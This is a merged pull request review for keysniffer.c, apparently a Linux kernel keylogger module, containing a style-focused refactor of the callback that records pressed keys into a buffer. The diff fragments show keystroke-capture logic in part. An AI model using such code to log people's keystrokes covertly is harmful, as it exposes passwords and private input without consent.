### PR TITLE
Simplified a method to make it more readable.

### PR DESCRIPTION
**Pull request by maitesin**

### CODE REVIEW

File: keysniffer.c [hunk 1]
```diff
@@ -109,6 +109,7 @@ int keysniffer_cb(struct notifier_block *nblock,
 {
 	size_t len;
 	struct keyboard_notifier_param *param = _param;
+	const char * pressed_key;
```
Comment (jarun) [inline keysniffer.c:112]: Please follow the kernel coding style.
const char *pressed_key;

File: keysniffer.c [hunk 2]
```diff
@@ -117,37 +118,24 @@ int keysniffer_cb(struct notifier_block *nblock,
...
-			strncpy(keys_buf + buf_pos,
-					us_keymap[param->value][0], len);
-			buf_pos += len;
-			keys_buf[buf_pos++] = '\n';
-
-			/* pr_debug("%s\n", us_keymap[param->value][0]); */
+			/* pr_debug("%s\n", pressed_key; */
 		}
 	}
-
```
Comment (jarun) [inline keysniffer.c:150]: Please leave this space.

**Comment by jarun** [comment]
Thanks! Will do the minor changes myself.

**Comment by maitesin** [comment]
Sorry about the code style, I was doing it just before leaving and I forgot it. Thanks for accepting the merge.

**Comment by jarun** [comment]
My pleasure! Thanks again!

**Pull request merged**